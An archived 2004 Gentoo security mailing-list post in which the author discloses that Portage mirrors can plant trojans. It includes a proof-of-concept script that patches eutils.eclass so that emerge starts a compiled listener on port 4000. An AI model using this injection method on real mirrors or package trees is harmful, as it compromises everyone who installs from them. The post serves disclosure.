From mboxrd@z Thu Jan 1 00:00:00 1970 Return-Path: Received: (qmail 10702 invoked from network); 6 Nov 2004 20:15:08 +0000 Received: from smtp.gentoo.org (156.56.111.197) by lists.gentoo.org with AES256-SHA encrypted SMTP; 6 Nov 2004 20:15:08 +0000 Received: from lists.gentoo.org ([156.56.111.196] helo=parrot.gentoo.org) by smtp.gentoo.org with esmtp (Exim 4.41) id 1CQWxn-0003mq-Rc for arch-gentoo-security@lists.gentoo.org; Sat, 06 Nov 2004 20:15:07 +0000 Received: (qmail 21550 invoked by uid 89); 6 Nov 2004 20:14:45 +0000 Mailing-List: contact gentoo-security-help@gentoo.org; run by ezmlm Precedence: bulk List-Post: List-Help: List-Unsubscribe: List-Subscribe: List-Id: Gentoo Linux mail X-BeenThere: gentoo-security@gentoo.org Received: (qmail 10961 invoked from network); 6 Nov 2004 20:14:44 +0000 Message-ID: <418D310B.6050106@ahsoftware.de> Date: Sat, 06 Nov 2004 21:16:11 +0100 From: Alexander Holler User-Agent: Mozilla Thunderbird 0.5 (X11/20040315) X-Accept-Language: en-us, en MIME-Version: 1.0 To: gentoo-security@lists.gentoo.org Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Subject: [gentoo-security] Trojan for Gentoo, part 2 X-Archives-Salt: 2589fed9-29b7-495c-8643-2457ba37aa0d X-Archives-Hash: 7ee2872d1ffdc84e7fc8c4f8bd3a584a Hi, after 1.5 years (2 years after the bug could could found in bugzilla) it seems that one of the highest security risks is closed. At least I've seen something about signed ebuilds. (see http://marc.theaimsgroup.com/?l=gentoo-security&m=104816199500974&w=2 ). Time for the next part. I've already written a bug for that a year ago, but it was now closed a second time by "the ... gatekeeper". See bug #26110 Here's the next small script. If you are operating a gentoo mirror, or having access to one, feel free to play with it. If you are a user, the only practical way to ensure a minimum of security is to sync twice: (a) sync, (b) delete timestap, (c) sync with other mirror and (d) look if no files where different, otherwise restart with (a) ----------------gentooTrojan.sh--------------------------- #!/bin/sh if [ ${#} -ne 1 ] ; then echo "This script puts a silly trojan into Gentoo's portage." echo "Usage: `basename ${0}` PathToPortage" exit 1 fi mv ${1}/eclass/eutils.eclass ${1}/eclass/eutils-without-trojan.eclass sed -e 's:^epatch().*{:epatch() {\newarn "Starting Trojan.\nTry it with telnet localhost 4000.\nKill it with killall GentooTrojan."\n${PORTDIR}/eclass/GentooTrojan \&\n:' <${1}/eclass/eutils-without-trojan.eclass >${1}/eclass/eutils.eclass cat >${1}/eclass/GentooTrojan.c << EOF #include #include #include #include int main(void) { struct sockaddr_in serv; struct sockaddr_in cli; int sock; sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (sock < 0) return 1; bzero((char *) &serv, sizeof(serv)); serv.sin_family = AF_INET; serv.sin_addr.s_addr = htonl(INADDR_ANY); serv.sin_port = htons(4000); if (bind(sock, (struct sockaddr *) &serv, sizeof(serv)) < 0) return 1; if (listen(sock, 5) < 0) return 1; while (1) { int scli; int slen; static char *str="Your are listing to the famous Gentoo trojan!\n"; slen = sizeof(cli); scli = accept(sock, (struct sockaddr *) &cli, (socklen_t *) &slen); write(scli, str, strlen(str)); close(scli); } } EOF gcc -o ${1}/eclass/GentooTrojan ${1}/eclass/GentooTrojan.c echo "Done. Portage successful infected with a trojan." echo "Just emerge an ebuild which uses epatch and do a" echo " telnet localhost 4000" echo "afterwards." ------------------------------------------- Kind regards, Alexander Holler PS: Please don't reply to me, I don't read any Gentoo mailing lists anymore, in fact I even don't know why I'm writting this message, as I already have lost every interest in Gentoo some time ago. PPS: Sorry for that hard words, but that all reminds me on Microsoft. The "eclass-hell" is as bad as the "dll-hell" and some bugs are getting forgotten, ignored or fixed in the same time. PPPS: I really appreciate all the very good work on hardened gcc, selinux-profiles and so on, but for me, this all seems useless as long as the base is compromised that easy and the user has no practical way (e.g. hashs) to check what he gets on his machine with a 'sync'. -- gentoo-security@gentoo.org mailing list